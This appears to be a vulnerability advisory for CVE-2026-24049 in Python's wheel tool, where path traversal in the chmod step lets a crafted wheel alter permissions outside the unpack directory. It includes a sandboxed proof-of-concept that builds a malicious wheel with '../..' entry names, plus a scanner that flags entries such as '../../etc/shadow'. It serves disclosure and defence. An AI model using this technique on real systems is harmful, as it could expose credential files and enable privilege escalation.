Wheel of Misfortune: Arbitrary File Permission Modification in Python's Wheel
Vulnerability ID: CVE-2026-24049
CVSS Score: 7.1
Published: 2026-01-22
A high-severity (CVSS 7.1) logic flaw in the wheel packaging tool lets a malicious wheel change the permissions of files outside the unpack directory via path traversal in the chmod target, potentially leading to privilege escalation.
TL;DR
The wheel unpack command sanitizes entry names when it extracts files (Python's zipfile strips leading slashes and ".." components), but it then applies the entry's permission bits (chmod) to the raw, unsanitized filename joined onto the destination directory. A crafted wheel whose entry name is an absolute path or contains ".." therefore makes the chmod land on a file outside the unpack directory, for example turning /etc/shadow or an SSH private key world-writable, which can lead to full system compromise. One precondition matters in practice: chmod only succeeds on files the unpacking user owns (or on any file when running as root), so system files such as /etc/shadow are reachable only when wheel unpack runs as root, while a victim's own files such as ~/.ssh/id_rsa are reachable from an ordinary account.
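The following is an added example, not code from the wheel project or from this advisory: a simplified re-implementation of the extract-then-chmod loop showing the vulnerable target computation (joinpath on the raw entry name) beside the fixed one (the path returned by ZipFile.extract). Everything runs inside a temporary directory; the file "victim_secret" is a constructed stand-in for a file outside the unpack directory such as /etc/shadow, and the wheel "evil-1.0-py3-none-any.whl" is constructed on the fly. Function names are this example's own.

```python
import stat
import tempfile
import zipfile
from pathlib import Path


def build_malicious_wheel(wheel_path: Path, entry_name: str, mode: int = 0o777) -> Path:
    """Write a minimal wheel-like zip (constructed sample) with one entry whose
    name escapes the destination and whose unix mode bits are world-writable."""
    zinfo = zipfile.ZipInfo(entry_name)
    # wheel reads the unix mode from the high 16 bits of external_attr
    zinfo.external_attr = (stat.S_IFREG | mode) << 16
    with zipfile.ZipFile(wheel_path, "w") as zf:
        zf.writestr(zinfo, b"")
    return wheel_path


def vulnerable_chmod_target(destination: Path, entry_name: str) -> Path:
    """wheel <= 0.46.1 behaviour: the raw entry name is joined onto the destination.
    '..' components are kept, and an absolute name makes joinpath() discard the
    destination entirely (pathlib semantics)."""
    return destination.joinpath(entry_name)


def fixed_chmod_target(wf: zipfile.ZipFile, zinfo: zipfile.ZipInfo, destination: Path) -> Path:
    """wheel 0.46.2 behaviour: chmod the path ZipFile.extract() actually wrote.
    extract() drops leading '/' and '..' components, so the path stays inside."""
    return Path(wf.extract(zinfo, destination))


def unpack(wheel_path: Path, destination: Path, vulnerable: bool) -> list[Path]:
    """Mimic the extract-then-chmod loop of `wheel unpack` (illustrative
    re-implementation, not wheel's own code). Returns the chmod targets."""
    targets = []
    with zipfile.ZipFile(wheel_path) as wf:
        for zinfo in wf.infolist():
            permissions = (zinfo.external_attr >> 16) & 0o777
            if vulnerable:
                wf.extract(zinfo, destination)  # sanitized write ...
                target = vulnerable_chmod_target(destination, zinfo.filename)  # ... unsanitized chmod
            else:
                target = fixed_chmod_target(wf, zinfo, destination)
            target.chmod(permissions)
            targets.append(target)
    return targets


def run_demo(vulnerable: bool) -> dict:
    """Run one unpack in a sandbox. 'victim_secret' (mode 0600, owned by us)
    stands in for a file outside the unpack directory such as /etc/shadow."""
    with tempfile.TemporaryDirectory() as tmp:
        sandbox = Path(tmp)
        victim = sandbox / "victim_secret"
        victim.write_text("secret")
        victim.chmod(0o600)

        destination = sandbox / "work" / "unpacked"
        # two '..' components walk from destination back up to the sandbox root
        wheel = build_malicious_wheel(sandbox / "evil-1.0-py3-none-any.whl", "../../victim_secret")
        targets = unpack(wheel, destination, vulnerable)

        return {
            "victim_mode": stat.S_IMODE(victim.stat().st_mode),
            "chmod_inside_destination": targets[0].resolve().is_relative_to(destination.resolve()),
        }


if __name__ == "__main__":
    print("vulnerable:", run_demo(True))   # victim_mode 0o777 (511), chmod landed outside
    print("fixed:     ", run_demo(False))  # victim_mode 0o600 (384), chmod stayed inside
```

With the vulnerable target computation the sandbox's "victim_secret" ends up mode 0777 even though extraction itself wrote nothing outside the destination; with the fixed computation it keeps 0600. vulnerable_chmod_target(Path("/tmp/unpacked"), "/etc/shadow") also illustrates the absolute-name case without touching anything: joinpath returns /etc/shadow.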
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-22 & CWE-732
- Attack Vector: Local (User-Assisted)
- CVSS v3.1: 7.1 (High)
- Impact: Integrity & Availability
- Exploit Status: PoC Available
- Platform: Python (Cross-Platform)
Affected Systems
- Linux workstations using the wheel CLI
- CI/CD pipelines processing untrusted Python packages
- Developer environments
- wheel: <= 0.46.1 (Fixed in: 0.46.2)
Code Analysis
Commit: 7a7d2de
Fix for CVE-2026-24049: use extracted path for chmod
- destination.joinpath(zinfo.filename).chmod(permissions)
+ Path(wf.extract(zinfo, destination)).chmod(permissions)
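Review bot: the old line is wrong for two distinct entry-name shapes and the regression test should cover both. With pathlib, destination.joinpath("/etc/shadow") discards destination entirely and returns /etc/shadow, while joinpath("../../etc/shadow") keeps the ".." components and chmod follows them; the new line is only safe because ZipFile.extract() strips leading separators and ".." components before writing and returns the normalized path it actually wrote, so the fix depends on extract() being called for every entry before chmod.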
Exploit Details
- GitHub: Regression test in official repository demonstrating the flaw
Mitigation Strategies
- Update the wheel package to version 0.46.2 or later.
- Avoid running package inspection tools as root/sudo.
- Implement file integrity monitoring (FIM) on critical system configuration files.
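For pipelines that must handle untrusted wheels before the upgrade lands, a pre-unpack gate that rejects wheels with escaping entry names or world-writable mode bits is a cheap complement to FIM. The scanner below is an added example (not wheel's own code or a tool from this advisory); the sample wheel it inspects is constructed inline, and the function name is this example's own.

```python
import stat
import tempfile
import zipfile
from pathlib import Path


def unsafe_entries(wheel_path) -> list[tuple[str, str]]:
    """Return (entry_name, reason) pairs for entries that should block unpacking.
    Checks the raw entry name (what a vulnerable chmod would use) and the unix
    mode bits stored in external_attr (what chmod would apply)."""
    findings = []
    with zipfile.ZipFile(wheel_path) as zf:
        for zinfo in zf.infolist():
            name = zinfo.filename
            parts = name.replace("\\", "/").split("/")
            mode = (zinfo.external_attr >> 16) & 0o777
            if name.startswith(("/", "\\")) or ":" in parts[0]:
                findings.append((name, "absolute path"))
            elif ".." in parts:
                findings.append((name, "parent-directory traversal"))
            elif "\\" in name:
                findings.append((name, "backslash separator"))
            if mode & stat.S_IWOTH:
                findings.append((name, f"world-writable mode {mode:o}"))
    return findings


def build_sample_wheel(path: Path) -> Path:
    """Constructed sample: one benign entry and three that the gate must flag."""
    entries = [
        ("pkg/__init__.py", 0o644),
        ("../../etc/shadow", 0o777),   # traversal + world-writable
        ("/root/.ssh/authorized_keys", 0o644),  # absolute name
        ("pkg/helper.py", 0o666),      # inside, but world-writable
    ]
    with zipfile.ZipFile(path, "w") as zf:
        for name, mode in entries:
            zinfo = zipfile.ZipInfo(name)
            zinfo.external_attr = (stat.S_IFREG | mode) << 16
            zf.writestr(zinfo, b"")
    return path


def scan_sample() -> list[tuple[str, str]]:
    with tempfile.TemporaryDirectory() as tmp:
        return unsafe_entries(build_sample_wheel(Path(tmp) / "sample-1.0-py3-none-any.whl"))


if __name__ == "__main__":
    for name, reason in scan_sample():
        print(f"REJECT {name!r}: {reason}")
```

Run it against each wheel before any unpack or install step and fail the job when the list is non-empty; the benign pkg/__init__.py entry produces no finding, the other three produce four findings between them.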
Remediation Steps:
- Identify systems with wheel installed: pip list | grep wheel
- Upgrade the package: pip install --upgrade wheel
- Verify the version: wheel version should return 0.46.2 or later